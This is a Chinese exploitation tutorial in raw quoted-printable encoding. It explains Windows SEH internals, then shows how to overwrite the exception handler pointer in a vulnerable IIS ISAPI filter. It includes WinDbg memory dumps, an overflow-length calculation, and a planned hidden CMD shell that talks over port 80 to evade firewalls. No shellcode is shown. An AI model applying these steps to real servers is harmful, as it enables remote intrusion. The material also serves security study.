=B1=E0=D2=EB=BA=C3=C1=CB=B3=CC=D0=F2excepti= on=D2=D4=BA=F3=D4=DAVisual=20 = Studio=D6=D0=B0=B4F10=BD=F8=C8=EBDebug=C4=A3=CA=BD=A3=AC=C8=BB=BA=F3=B4=F2= =BF=AA=CB=FC=B5=C4=B7=B4=BB=E3=B1=E0=C2=EB=B4=B0=BF=DA=A1=A3=CF=C2=C3=E6=CA= =C7=D4=DA=CE=D2=B5=C4=BB=FA=C6=F7Dallas=C9=CF=B7=B4=BB=E3=B1=E0=B5=C4=BD=E1= =B9=FB=A3=AC=D4=DA=C4=E3=C3=C7=B5=C4=BB=FA=C6=F7=C9=CF=B7=B4=BB=E3=B1=E0=B3= =F6=C0=B4=B5=C4=D6=B8=C1=EE=B5=D8=D6=B7=BF=C9=C4=DC=B2=BB=CC=AB=D2=BB=D1=F9= =A3=BA


15:
16:  =20 VOID main(VOID)
17:   {
00401070   = = push        ebp
00401071 =  =20 mov        =20 ebp,esp
00401073  =20 = push        0FFh
00401075 = ; =20 push        offset = string=20 "Do Nothing\n"+14h=20 = (00420040)
/*
=D2=D4=C9=CF=CA=C7=B8=D5=BD=F8=C8=EBmain=BA=AF=CA=FD=CA= =B1=CF=B5=CD=B3=B5=C4=D2=BB=D0=A9=C9=E8=D6=C3=A1=A3
*/
0040107A&nbs= p; =20 push        offset=20 __except_handler3 (004012e0)
0040107F  =20 mov        =20 eax,fs:[00000000]
00401085  =20 = push        eax
00401086 =  =20 mov         dword = ptr=20 = fs:[0],esp
/*
=D5=E2=C0=EF=CF=B5=CD=B3=C9=E8=D6=C3=B5=B1=C7=B0Threa= d=B5=C4_EXCEPTION_REGISTRATION_RECORD=BD=E1=B9=B9=A3=BA=D4=DAfs:[0]=D6=D0= =D3=D0=BA=AF=CA=FD=B5=C4_EXCEPTION_REGISTRATION_RECORD=BD=E1=B9=B9=B5=C4=D6= =B8=D5=EB=A3=AC=CF=C8=B0=D1=CB=FC=B4=E6=C8=EB=B6=D1=D5=BB=A3=AC=C8=BB=BA=F3= =CD=F9fs:[0]=D6=D0=B4=E6=C8=EB=D6=B8=CF=F2=B5=B1=C7=B0Thread=B5=C4_EXCEPT= ION_REGISTRATION_RECORD=BD=E1=B9=B9=D6=B8=D5=EB=A1=A3

=D5=E2=B8=F6= _EXCEPTION_REGISTRATION_RECORD=BD=E1=B9=B9=B6=D4=D3=A6=D7=C5=B3=CC=D0=F2=B5= =C4_except=B2=BF=B7=D6=A1=A3
*/
0040108D  =20 add        =20 esp,0B8h
00401090  =20 = push        ebx
00401091 =  =20 = push        esi
00401092 =  =20 = push        edi
00401093 =  =20 mov         dword = ptr=20 [ebp-18h],esp
00401096  =20 lea        =20 edi,[ebp-58h]
00401099  =20 mov        =20 ecx,10h
0040109E  =20 mov        =20 eax,0CCCCCCCCh
004010A3   rep=20 stos    dword ptr=20 [edi]
18:      =20 __try
004010A5  =20 mov         dword = ptr=20 [ebp-4],0
19:      =20 = {
20:
21:         &nbs= p;    =20 = RaiseException(1,         //=20 exception=20 = code
22:          &n= bsp;       =20 = 0,            = ;        //=20 continuable=20 = exception
23:         &nb= sp;        =20 0,=20 = NULL);           &= nbsp;=20 // no arguments
004010AC  =20 mov        =20 esi,esp
004010AE  =20 = push        0
004010B0 &n= bsp;=20 = push        0
004010B2 &n= bsp;=20 = push        0
004010B4 &n= bsp;=20 = push        1
004010B6 &n= bsp;=20 call        dword = ptr=20 [__imp__RaiseException@16=20 = (0042519c)]
/*
__imp__RaiseException@16=B1=ED=CA=BERaiseException=D0= =E8=D2=AA=B4=D3=C6=E4=CB=FB=B5=C4=B6=AF=CC=AC=C1=AA=BD=E1=BF=E2=CA=E4=C8=EB= =A3=AC=CB=FC=CA=C7=D2=BB=B8=F6_stdcall=BA=AF=CA=FD=A3=AC=D7=DC=B9=B2=D3=D0= 16=B8=F6=D7=D6=BD=DA=B5=C4=CA=E4=C8=EB=B2=CE=CA=FD=A1=A3
*/
004010B= C  =20 cmp        =20 esi,esp
004010BE  =20 call        __chkesp = (004011b0)
24:
25:       = }
004010C3  =20 mov         dword = ptr=20 [ebp-4],0FFFFFFFFh
004010CA  =20 jmp         = $L53859+17h=20 (004010e9)
26:       = __except (=20 FilterFunction() )
004010CC  =20 = call        @ILT+5(FilterFunction= )=20 (0040100a)
$L53860:
004010D1  =20 ret
$L53859:
004010D2  =20 mov         = esp,dword ptr=20 [ebp-18h]
27:      =20 = {
28:          =20 printf("Do=20 = Nothing\n");          &= nbsp;     //=20 this is printed last
004010D5  =20 push        offset = string=20 "Do Nothing\n" (0042002c)
004010DA  =20 call        printf=20 (00401130)
004010DF  =20 add        =20 esp,4
29:      =20 }
004010E2  =20 mov         dword = ptr=20 [ebp-4],0FFFFFFFFh
30:   = }
004010E9  =20 mov         = ecx,dword ptr=20 [ebp-10h]
004010EC  =20 mov         dword = ptr=20 = fs:[0],ecx
/*
=B3=CC=D0=F2=BD=AB=D2=AA=BD=E1=CA=F8=D4=CB=D0=D0=A3=AC= =B0=D1=C7=B0=D2=BB=B8=F6_EXCEPTION_REGISTRATION_RECORD=BD=E1=B9=B9=D6=B8=D5= =EB=BB=D6=B8=B4=B5=BDfs:[0]=D6=D0=A1=A3
*/
004010F3  =20 pop        =20 edi
004010F4  =20 pop        =20 esi
004010F5  =20 pop        =20 ebx
004010F6  =20 add        =20 esp,58h
004010F9  =20 cmp        =20 ebp,esp
004010FB  =20 call        __chkesp = (004011b0)
00401100  =20 mov        =20 esp,ebp
00401102  =20 pop        =20 ebp
00401103  =20 = ret


=D4=DA=C9=CF=C3=E6=B5=C4=BB=E3=B1=E0=B3=CC=D0=F2=D6=D0=B6=E0= =B4=A6=D3=C3=B5=BD=C1=CBfs=A3=BA[00000000]=A3=AC=D3=D0=B5=C4=C5=F3=D3=D1=D2= =B2=D0=ED=D6=AA=B5=C0=C4=C7=CA=B5=BC=CA=C9=CF=CA=C7=B5=B1=C7=B0Thread=B5=C4= Thread=20 Information=20 = Block(TIB)=BD=E1=B9=B9=B5=C4=C6=F0=CA=BC=B5=D8=D6=B7=A1=A3=D4=DA=CD=B7=CE= =C4=BC=FEwinnt.h=BA=CDntddk.h=D6=D0=A3=AC=CE=D2=C3=C7=BF=C9=D2=D4=D5=D2=B5= =BDTIB=BD=E1=B9=B9=B5=C4=B6=A8=D2=E5=A3=BA

//
//  NT_= TIB=20 - Thread Information Block - Portable=20 part.
//
//      This is = the=20 subsystem portable part of the Thread Information=20 Block.
//      It appears = as the=20 first part of the TEB for all threads which=20 have
//      a user mode=20 component.
//
//

// begin_winnt

typedef = struct=20 _NT_TIB {
    struct=20 _EXCEPTION_REGISTRATION_RECORD=20 *ExceptionList;
    PVOID=20 StackBase;
    PVOID=20 StackLimit;
    PVOID=20 SubSystemTib;
    union=20 {
        PVOID=20 = FiberData;
        ULONG=20 = Version;
    };
    PVOID=20 ArbitraryUserPointer;
    struct = _NT_TIB=20 *Self;
} NT_TIB;
typedef NT_TIB=20 = *PNT_TIB;
//

=B4=F3=BC=D2=BF=C9=D2=D4=BF=B4=B5=BD=A3=ACTIB=BD=E1= =B9=B9=B5=C4=B5=DA=D2=BB=B8=F6member=BE=CD=CA=C7_EXCEPTION_REGISTRATION_R= ECORD=D6=B8=D5=EB=A1=A3=D4=DATIB=BD=E1=B9=B9=D6=D0=A3=AC=BB=B9=B1=A3=B4=E6= =D3=D0=B5=B1=C7=B0Thread=B5=C4=C6=E4=CB=FB=D0=C5=CF=A2=A3=AC=D5=E2=C0=EF=BE= =CD=BA=F6=C2=D4=B2=BB=BC=C6=C1=CB=A1=A3

=D4=DA=C9=CF=C3=E6=B5=C4=BB= =E3=B1=E0=B3=CC=D0=F2=D6=D0=A3=AC=B4=D3=B5=D8=D6=B70X0040107A=B5=BD0X0040= 1086=B5=C4=D6=B8=C1=EE=D4=DA=B6=D1=D5=BB=D6=D0=C9=E8=D6=C3=C1=CB=D2=BB=B8= =F6_EXCEPTION_REGISTRATION_RECORD=BD=E1=B9=B9=A3=AC=B2=A2=B0=D1=D5=E2=B8=F6= =BD=E1=B9=B9=B5=C4=D6=B8=D5=EB=B4=E6=C8=EBfs=A3=BA[00000000]=A1=A3_EXCEPT= ION_REGISTRATION_RECORD=BD=E1=B9=B9=B0=FC=C0=A8=C1=BD=B8=F6=D6=B8=D5=EB=A3= =BA=B5=DA=D2=BB=B8=F6=D6=B8=D5=EB(=B4=D3=B5=D8=D6=B7fs=A3=BA[00000000]=C8= =A1=B5=C3)=D6=B8=CF=F2=C7=B0=D2=BB=B8=F6_EXCEPTION_REGISTRATION_RECORD=BD= =E1=B9=B9=A3=AC=B6=F8=C7=B0=D2=BB=B8=F6_EXCEPTION_REGISTRATION_RECORD=BD=E1= =B9=B9=B5=C4=B5=DA=D2=BB=B8=F6=D6=B8=D5=EB=D3=D6=D6=B8=CF=F2=B8=FC=C7=B0=D2= =BB=B8=F6_EXCEPTION_REGISTRATION_RECORD=BD=E1=B9=B9=A3=AC=D5=E2=D1=F9=CB=F9= =D3=D0=B5=C4_EXCEPTION_REGISTRATION_RECORD=20 = =BE=CD=D0=CE=B3=C9=C1=CB=D2=BB=B8=F6=C1=B4(link)=A1=A3_EXCEPTION_REGISTRA= TION_RECORD=B5=C4=B5=DA=B6=FE=B8=F6=D6=B8=D5=EB=D6=B8=CF=F2=D2=BB=B8=F6=BD= =D0=D7=F6__except_handler3=B5=C4=BA=AF=CA=FD=A3=AC=D5=E2=B8=F6=BA=AF=CA=FD= =CA=C7VC++=CC=D8=D3=D0=B5=C4Exception=20 = Handler=A3=BB=D4=DA=B3=CC=D0=F2=D4=CB=D0=D0=B7=A2=C9=FAException=CA=B1=A3= =AC=CB=FC=BB=E1=C2=ED=C9=CF=CC=F8=B5=BD__except_handler3=D6=B4=D0=D0=A3=AC= =C8=BB=BA=F3=D3=C9__except_handler3=D7=F7=D2=BB=D0=A9=B3=F5=B2=BD=B4=A6=C0= =ED=BA=F3=B2=C5=D7=AA=C8=A5=D6=B4=D0=D0_except=BB=A8=C0=A8=BA=C5=C0=EF=C3= =E6=B5=C4=B4=FA=C2=EB(=D4=DA=CE=D2=C3=C7=B5=C4=C0=FD=D7=D3=D6=D0=A3=AC=BB= =A8=C0=A8=BA=C5=C0=EF=C3=E6=D6=BB=D3=D0printf=BA=AF=CA=FD)=A1=A3

=BD= =B2=B5=BD=D5=E2=C0=EF=A3=AC=CE=D2=CF=EB=B4=F3=BC=D2=D2=B2=D3=A6=B8=C3=C3=F7= =B0=D7=C1=CB=A3=BA=D5=E2=B8=F6__except_handler3=D6=B8=D5=EB=BE=CD=CA=C7=B1= =BE=D5=C2=BD=F8=B9=A5=B5=C4=C4=BF=B1=EA=A3=AC=CE=D2=C3=C7=BD=AB=D3=C3=D6=B8= =CF=F2=BA=DA=BF=CD=B4=FA=C2=EB=B5=C4=D6=B8=D5=EB=C8=A5=B8=B2=B8=C7=CB=FC=A1= =A3=D2=F2=CE=AA=D7=D6=B7=FB=B4=AE=D4=DA=B8=B2=B8=C7__except_handler3=D6=B8= =D5=EB=B5=C4=CD=AC=CA=B1=BB=B9=BB=E1=B8=B2=B8=C7=B5=F4=BA=DC=B6=E0=D6=D8=D2= =AA=B5=C4=CF=B5=CD=B3=B5=F7=D3=C3=D0=C5=CF=A2=A3=AC=CB=F9=D2=D4=B3=CC=D0=F2= =D4=DA=D4=CB=D0=D0=CA=B1=BF=CF=B6=A8=BB=E1=B2=FA=C9=FAException=20 = (=D7=EE=D3=D0=BF=C9=C4=DC=B5=C4=BE=CD=CA=C7=B7=C3=CE=CA=B3=F6=B4=ED---- = Access=20 = Violation)=A3=AC=EC=B6=CA=C7=CF=B5=CD=B3=BD=AB=C6=C8=CA=B9=B3=CC=D0=F2=B4= =A6=C0=EDException=A3=AC=D2=B2=BE=CD=CA=C7=C6=F3=CD=BC=D4=CB=D0=D0=BA=AF=CA= =FD__except_handler3=A3=AC=B5=AB=CA=C7=D5=E2=B8=F6=BF=C9=C1=AF=B5=C4=BC=D2= =BB=EF=C3=BB=CF=EB=B5=BD=A3=AC=D5=E2=B8=F6=BA=AF=CA=FD__except_handler3=B5= =C4=D6=B8=D5=EB=D2=D1=BE=AD=B1=BB=D0=DE=B8=C4=B3=C9=BA=DA=BF=CD=C2=EB=D6=B8= =D5=EB=A3=AC=CB=F9=D2=D4=B4=A6=C0=EDException=BE=CD=B1=E4=B3=C9=D6=B4=D0=D0= =BA=DA=BF=CD=C2=EB=A1=A3

=D4=DA=BD=E1=CA=F8=D3=D0=B9=D8SEH=B5=C4=C4= =DA=C8=DD=D6=AE=C7=B0=A3=AC=C8=C3=CE=D2=C3=C7=C0=B4=D7=F7=D2=BB=B8=F6=D0=A1= =CA=D4=D1=E9=A3=BA
=C8=E7=B9=FB=CE=D2=C3=C7=C8=C3=D4=B4=B3=CC=D0=F2exc= eption.cpp=D6=D0=B5=C4FilterFunction=B7=B5=BB=D8EXCEPTION_CONTINUE_SEARCH= =20 = =B6=F8=B2=BB=CA=C7EXCEPTION_EXECUTE_HANDLER=A3=AC=B3=CC=D0=F2=D4=CB=D0=D0= =BB=E1=D3=D0=CA=B2=C3=B4=BD=E1=B9=FB=A3=BF=CF=C8=D0=DE=B8=C4=D4=B4=B3=CC=D0= =F2exception.cpp=A1=A2=D4=D9=B1=E0=D2=EB=BA=C3=A1=A2=D4=CB=D0=D0=A1=A2BAN= G=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=AC=CE=D2=C3=C7=B5=C3=B5=BD=D2=BB=B8=F6= Message=20 Box=A3=BA



=CE=AA=CA=B2=C3=B4=BB=E1=CA=C7=D5=E2=D1=F9=B5=C4=BD=E1= =B9=FB=C4=D8=A3=BFFilterFunction=B7=B5=BB=D8EXCEPTION_CONTINUE_SEARCH=B1=ED= =CA=BE=B5=B1=C7=B0=B5=C4_EXCEPTION_REGISTRATION_RECORD(=CB=FC=B6=D4=D3=A6= =D4=B4=B3=CC=D0=F2=D6=D0_except=B2=BF=B7=D6)=B2=BB=C4=DC=B4=A6=C0=ED=D5=E2= =B8=F6Exception=A3=BB=EC=B6=CA=C7=CF=B5=CD=B3=D1=D8=D7=C5_EXCEPTION_REGIS= TRATION_RECORD=B5=C4=C1=B4=BD=E1=C8=A5=D5=D2=C7=B0=D2=BB=B8=F6_EXCEPTION_= REGISTRATION_RECORD=A3=AC=BF=B4=CB=FC=C4=DC=B2=BB=C4=DC=B4=A6=C0=ED=D5=E2= =B8=F6Exception=A3=BB=D5=E2=D1=F9=D2=BB=D6=B1=D5=D2=CF=C2=C8=A5=B5=C4=BD=E1= =B9=FB=A3=AC=BB=F2=D5=DF=CA=C7=D5=D2=B5=BD=C4=DC=B4=A6=C0=ED=D5=E2=B8=F6E= xception=B5=C4_EXCEPTION_REGISTRATION_RECORD=A3=AC=BB=F2=D5=DF=CA=C7=D5=D2= =B5=BD=C1=B4=BD=E1=B5=C4=D7=EE=BA=F3=A3=AC=D3=C9=CF=B5=CD=B3=B5=C4=C8=B1=CA= =A1Exception=20 = Handler=B4=A6=C0=ED=A3=AC=D5=E2=CF=F3=CE=D2=C3=C7=D5=E2=B8=F6=CA=D4=D1=E9= =B5=C4=C7=E9=BF=F6=A1=A3=CF=B5=CD=B3=B5=C4=C8=B1=CA=A1Exception = Handler=BE=CD=CA=C7=C8=D3=B3=F6=D2=BB=B8=F6Message=20 = Box=A3=AC=B8=E6=CB=DF=C4=E3=D2=BB=D0=A9=B3=F6=B4=ED=D0=C5=CF=A2=A1=A3
=

Exploit IIS =B5=DA=D2=BB=B2=BD----Vulerable ISAPI=20 = Filter=B5=C4=C4=DA=B4=E6=B7=D6=C5=E4


=C8=E7=B9=FB=C7=B0=C3=E6=B5= =C4=D6=AA=CA=B6=D7=BC=B1=B8=C4=E3=B6=BC=CD=EA=B3=C9=C1=CB=B5=C4=BB=B0=A3=AC= =CF=E0=D0=C5=C4=E3=D2=D1=BE=AD=CE=E4=D7=B0=B5=BD=D1=C0=B3=DD=C1=CB=A3=AC=CE= =D2=C3=C7=BF=C9=D2=D4=D2=BB=B2=BD=D2=BB=B2=BD=D1=D0=BE=BFExploit=20 Vulnerable = IIS=B5=C4=B7=BD=B7=A8=A3=AC=BB=F2=D5=DF=B8=FC=D7=BC=C8=B7=B5=C4=CB=B5=A3=AC= =D1=D0=BE=BFExploit Vulerable ISAPI=20 = Filter=B5=C4=B7=BD=B7=A8=A1=A3=B5=DA=D2=BB=B2=BD=A3=AC=CE=D2=C3=C7=BD=AB=D1= =D0=BE=BFFilter=20 = logger=B5=C4=C4=DA=B4=E6=B7=D6=C5=E4=C7=E9=BF=F6=A1=A3

=C6=F4=B6=AF= =CE=D2=C3=C7=B8=D5=B0=B2=D7=B0=BA=C3=B5=C4Windbg=A3=AC=B4=D3Debug=3D>A= ttach to a=20 Process=3D>=B4=F2=BF=AAAttach to a=20 = Process=B6=D4=BB=B0=BF=F2=A3=AC=B4=D3=B6=D4=BB=B0=BF=F2=D6=D0=D1=A1=D4=F1= =BD=F8=B3=CCinetinfo.exe=C8=C3Windbg=C8=A5Attach(=C4=E3=D2=B2=BF=C9=D2=D4= =CA=B9=D3=C3=C3=FC=C1=EE=A1=B0.attach=20 = pid=A1=B1=C0=B4=CA=B5=CF=D6Attach)=A1=A3inetinfo.exe=CA=C7=D2=BB=B8=F6=BA= =DC=B8=B4=D4=D3=B5=C4=BD=F8=B3=CC=A3=AC=CB=F9=D2=D4=D5=E2=B8=F6Attach=D2=AA= =B6=E0=BB=A8=BC=B8=C3=EB=D6=D3=A1=A3=D4=DAAttach=BA=F3=A3=AC=B4=D3Debug=3D= >Go=C8=C3=B3=CC=D0=F2=BC=CC=D0=F8=D4=CB=D0=D0=A1=A3

=B4=D3File=3D= >Open=20 Source = File=B4=F2=BF=AA=D4=B4=B3=CC=D0=F2D:\MyJob\securitylab\ISAPI\Logger.cpp(=D2= =B2=BF=C9=D2=D4=D3=C3=C3=FC=C1=EE=A1=B0.open=20 = D:\MyJob\securitylab\ISAPI\Logger.cpp=A1=B1=B4=F2=BF=AA=D4=B4=B3=CC=D0=F2= )=A1=A3

=CE=D2=C3=C7=D0=E8=D2=AA=C8=C3=B3=CC=D0=F2=D4=CB=D0=D0=B5=BD= logger=CA=B1=D4=DD=CD=A3=CF=C2=C0=B4=A3=AC=D2=D4=B7=BD=B1=E3=B9=DB=B2=EC=C4= =DA=B4=E6=B5=C4=C7=E9=BF=F6=A1=A3=B4=D3Edit=3D>=20 = Breakpoints=3D>=B4=F2=BF=AABreakpoints=B6=D4=BB=B0=BF=F2=A3=AC=D4=DA=D4= =B4=B3=CC=D0=F2=B5=C4=B5=DA54=D0=D0=C9=E8=D6=C3=B6=CF=B5=E3=A3=AC=B5=DA54= =D0=D0=BE=CD=CA=C7=A3=BA
......
pLogData=20 =3D = (PHTTP_FILTER_LOG)pvNotification;
......
(=C3=FC=C1=EE=CE=AAbp0=20 {,logger.cpp,logger.dll}@54=20 = /H0)=A1=A3

=CF=D6=D4=DAinetinfo.exe=BE=CD=D4=DAWindbg=B5=C4=BC=E0=BF= =D8=CF=C2=D4=CB=D0=D0=A3=AC=D7=BC=B1=B8=B7=FE=CE=F1HTTP=C7=EB=C7=F3=A1=A3= =BD=D3=CF=C2=C0=B4=A3=AC=CE=D2=D4=DA=CD=AC=D2=BB=CC=A8=BC=C6=CB=E3=BB=FAd= allas=C9=CF=C6=F4=B6=AFMS=20 Internet=20 = Explorer(=B5=B1=C8=BB=C4=E3=D2=B2=BF=C9=D2=D4=B4=D3=CD=F8=C2=E7=C9=CF=C6=E4= =CB=FC=BC=C6=CB=E3=BB=FA=C6=F4=B6=AFExplorer)=A3=AC=BC=FC=C8=EBURL=A1=B0h= ttp=A3=BA//dallas/index.htm=A1=B1=20 = =D4=D9=B0=B4Enter=A1=A3=BE=CD=D4=DA=C4=C7=D2=BB=CB=B2=BC=E4=A3=AC=C4=E3=BF= =C9=D2=D4=BF=B4=B5=BDWindbg=D2=BB=C9=C1=D2=BB=C9=C1=B5=C4=A3=AC=D5=E2=CA=C7= =D2=F2=CE=AA=B3=CC=D0=F2=D2=D1=BE=AD=D4=CB=D0=D0=B5=BD=B5=DA54=D0=D0=B5=C4= =B6=CF=B5=E3=A1=A3

=BB=D8=B5=BDWindbg=D6=D0=A3=AC=B3=CC=D0=F2=D5=FD= =CD=A3=C1=F4=D4=DA=B5=DA54=D0=D0=A3=AC=B5=C8=D7=C5=D3=C3=BB=A7=CA=E4=C8=EB= =CF=C2=D2=BB=B8=F6=C3=FC=C1=EE=A1=A3=CF=C2=C3=E6=CA=C7=CE=D2=D4=DAWindbg=B5= =C4=C3=FC=C1=EE(Command)=B4=B0=BF=DA=B2=D9=D7=F7=B5=C4=B9=FD=B3=CC=A3=AC=C4= =BF=B5=C4=CA=C7=CE=AA=C1=CB=C1=CB=BD=E2logger=B5=C4=C4=DA=B4=E6=B7=D6=C5=E4= =C7=E9=BF=F6=A3=BA

>=20 DD sz
0x00EFF500  cccccccc cccccccc cccccccc = cccccccc=20 ................
0x00EFF510  cccccccc cccccccc = cccccccc=20 cccccccc ................
0x00EFF520  cccccccc = cccccccc=20 cccccccc cccccccc = ................
0x00EFF530  cccccccc=20 cccccccc cccccccc cccccccc ................
/*
DD = sz=B1=ED=CA=BEDouble=20 = Word=CF=D4=CA=BE=BB=BA=B3=E5=C7=F8sz=B5=C4=C4=DA=C8=DD=A1=A3
=BB=BA=B3= =E5=C7=F8sz=CA=F4=D3=DA=B7=C7=B3=F5=CA=BC=BB=AF=B1=E4=C1=BF=A3=AC=CB=F9=D2= =D4=CF=B5=CD=B3=D3=C30XCCCCCCCC=B3=E4=CC=EE=A3=BB=D7=A2=D2=E2=CB=FC=B5=C4= =C6=F0=CA=BC=B5=D8=D6=B7=CA=C70x00EFF500=A1=A3
*/
>=20 DD fs:0
0x0038:0x0000  00efffdc 00f00000 = 00efd000=20 00000000 = ................
0x0038:0x0010  00001e00=20 00000000 7ffd6000 00000000=20 .........`......
0x0038:0x0020  0000066c = 00000528=20 00000000 00000000=20 l...(...........
0x0038:0x0030  7ffdf000 = 000003e5=20 00000000 00000000 ................
/*
DD = fs=A3=BA0=B1=ED=CA=BEDouble=20 Word=CF=D4=CA=BEThread Information=20 = Block(TIB)=B5=C4=C4=DA=C8=DD=A1=A3TIB=B5=C4=B5=DA=D2=BB=B8=F6member=BE=CD= =CA=C7_EXCEPTION_REGISTRATION_RECORD=B5=C4=D6=B8=D5=EB0X00efffdc=A1=A3
=CE=D2=C3=C7=D4=D9=BF=B4=BF=B4=D5=E2=B8=F6_EXCEPTION_REGISTRATION_RE= CORD=B5=C4=C4=DA=C8=DD=A3=BA
*/
>=20 DD efffdc
0x00EFFFDC  ffffffff 77ea13fd = 77e9c008=20 00000000 .......w...w....
0x00EFFFEC  00000000 = 00000000=20 6d70175a abcdef01 = ........Z.pm....
0x00EFFFFC  00000000=20 ???????? ???????? ????????=20 ....????????????
0x00F0000C  ???????? ???????? = ????????=20 ???????? ????????????????
0x00F0001C  ???????? = ????????=20 ???????? ???????? = ????????????????
0x00F0002C  ????????=20 ???????? ???????? ????????=20 ????????????????
0x00F0003C  ???????? ???????? = ????????=20 ???????? ????????????????
0x00F0004C  ???????? = ????????=20 ???????? ????????=20 = ????????????????
/*
=CE=D2=C3=C7=CB=B5=B9=FD_EXCEPTION_REGISTRATION= _RECORD=BD=E1=B9=B9=D3=D0=C1=BD=B8=F6=D6=B8=D5=EB=A3=BA=B5=DA=D2=BB=B8=F6= =D6=B8=D5=EB=D3=A6=B8=C3=D6=B8=CF=F2=C7=B0=D2=BB=B8=F6_EXCEPTION_REGISTRA= TION_RECORD=A3=AC=B5=AB=CA=C7=D5=E2=C0=EF=D5=E2=B8=F6=D6=B8=D5=EB=B5=C4=D6= =B5=CE=AA0xffffffff=A3=AC=CE=D2=B2=BB=CC=AB=C7=E5=B3=FE=CB=FC=B5=C4=BA=AC= =D2=E5=A3=BB=B5=DA=B6=FE=B8=F6=D6=B8=D5=EB0X77ea13fd=D3=A6=B8=C3=CA=C7Exc= eption=20 = Handler=A3=AC=B6=D4=D3=DA=D3=C3VC++=B1=E0=D2=EB=B6=F8=B3=C9logger=A3=ACEx= ception=20 = Handler=D3=A6=B8=C3=BE=CD=CA=C7__except_handler3=BA=AF=CA=FD=A1=A3=CE=D2=C3= =C7=BF=C9=D2=D4=B0=D1=B4=D30X77ea13fd=BF=AA=CA=BC=B5=C4=C4=DA=C8=DD=B7=B4= =BB=E3=B1=E0=C8=E7=CF=C2=A3=BA
*/
>=20 u=20 = 77ea13fd
KERNEL32!__except_handler3+0x0:
77EA13FD  55&nbs= p;            = ; =20 = push        ebp   =             &= nbsp;          =20 =
77EA13FE  8BEC       &nb= sp;    =20 mov        =20 = ebp,esp           =             &= nbsp;  =20 =
77EA1400  83EC08       &= nbsp;  =20 sub        =20 = esp,8           &n= bsp;           &nb= sp;  =20 =
77EA1403  53        = ;      =20 = push        ebx   =             &= nbsp;          =20 =
77EA1404  56        = ;      =20 = push        esi   =             &= nbsp;          =20 =
77EA1405  57        = ;      =20 = push        edi   =             &= nbsp;          =20 =
77EA1406  55        = ;      =20 = push        ebp   =             &= nbsp;          =20 =
77EA1407  FC        = ;      =20 = cld           &nbs= p;            = ;            =
>
/*
u=20 = 77ea13fd=B1=ED=CA=BE=B7=B4=BB=E3=B1=E0=B4=D377ea13fd=BF=AA=CA=BC=B5=C4=D6= =B8=C1=EE=A3=AC=CB=FC=B9=FB=C8=BB=BE=CD=CA=C7__except_handler3=A1=A3
*= /


=B4=D3=C9=CF=C3=E6=B5=C4=B7=D6=CE=F6=D6=D0=CE=D2=C3=C7=BF=C9= =D2=D4=BF=B4=B5=BD=A3=AC=BB=BA=B3=E5=C7=F8sz=B5=C4=C6=F0=CA=BC=B5=D8=D6=B7= =D4=DA0x00EFF500=A3=AC=B6=F8=CE=D2=C3=C7=D0=E8=D2=AA=B8=B2=B8=C7=B5=C4Exc= eption=20 = Handler=D6=B8=D5=EB=D4=DA0xefffe0=A3=AC=CB=F9=D2=D4=CE=D2=C3=C7=D3=C3=D3=DA= =D4=EC=B3=C9=D2=E7=B3=F6=B5=C4=D7=D6=B7=FB=B4=AE=B3=A4=B6=C8=B1=D8=D0=EB=B4= =EF=B5=BD0xefffe0-0xEFF500=3D0xae0=3D2784=D7=D6=BD=DA=A1=A3=D5=E2=B8=F6=B3= =A4=B6=C8=D7=E3=B9=BB=CE=D2=C3=C7=D0=B4=BA=DC=B8=B4=D4=D3=B5=C4=BA=DA=BF=CD= =C2=EB=A1=A3


Exploit=20 IIS=20 = =B5=DA=B6=FE=B2=BD----=BA=DA=BF=CD=D0=D0=B6=AF


=CF=D6=D4=DA=CE= =D2=C3=C7=D3=D0=C1=CB=D7=E3=B9=BB=B5=C4=C4=DA=B4=E6=BF=D5=BC=E4=A3=AC=B6=F8= =CE=D2=C3=C7=CA=C7=B4=D3=C0=B4=D2=B2=B2=BB=C8=B1=C9=D9=CA=B1=BC=E4=B5=C4-= ---=D2=F2=CE=AA=CE=D2=C3=C7=CA=C7=D4=E7=C9=CF=B0=CB=BE=C5=B5=E3=D6=D3=B5=C4= =CC=AB=D1=F4=A3=AC=CE=D2=C3=C7=CB=F9=D0=E8=D2=AA=B5=C4=D6=BB=CA=C7=D7=E3=B9= =BB=B5=C4=CF=EB=CF=F3=C1=A6=C0=B4=CA=B5=CA=A9=CE=D2=C3=C7=B5=C4=BA=DA=BF=CD= =D0=D0=B6=AF=A3=BA=D5=E2=D2=BB=D5=C2=CE=D2=C3=C7=B5=C4=BA=DA=BF=CD=C2=EB=BD= =AB=D2=C0=B8=BD=D7=C5Microsoft=20 IIS=B2=FA=C9=FA=D2=BB=B8=F6=D2=FE=B2=D8=CA=BD=B5=C4CMD = shell=A3=AC=CD=AC=CA=B1=B0=D1IIS=BD=F8=B3=CC=D6=D0=B5=C4=D2=BB=B8=F6dll = ---- msw3prt.dll=D0=DE=B8=C4=B3=C9CMD=20 = shell=D3=EB=CD=E2=BD=E7=CD=A8=BB=B0=B5=C4=C7=FE=B5=C0=A1=A3=D5=E2=D1=F9=CE= =D2=C3=C7=BE=CD=BF=C9=D2=D4=CD=A8=B9=FDInternet = Explore=BB=F2=D5=DFNetscape=B5=C4URL=CF=F2=C3=D8=C3=DC=C7=FE=B5=C0=B4=AB=B5= =DD=C3=FC=C1=EE=B5=BDCMD=20 shell=A3=AC=B6=F8CMD = shell=D6=B4=D0=D0=CD=EA=C3=FC=C1=EE=BA=F3=B0=D1=BD=E1=B9=FB=CD=A8=B9=FD=CD= =AC=D2=BB=C7=FE=B5=C0=B7=B5=BB=D8=B8=F8Internet=20 = Explore=BB=F2=D5=DFNetscape=A1=A3=D7=A2=D2=E2=CE=D2=C3=C7=B5=C4Exploit=CA= =C7=D4=DAPort=20 = 80=C9=CF=BD=F8=D0=D0=B5=C4=A3=AC=CB=F9=D2=D4=B7=C0=BB=F0=C7=BD(Firewall)=D2= =B2=B7=C0=B2=BB=D7=A1=D5=E2=B8=F6Exploit=A1=A3=20 =

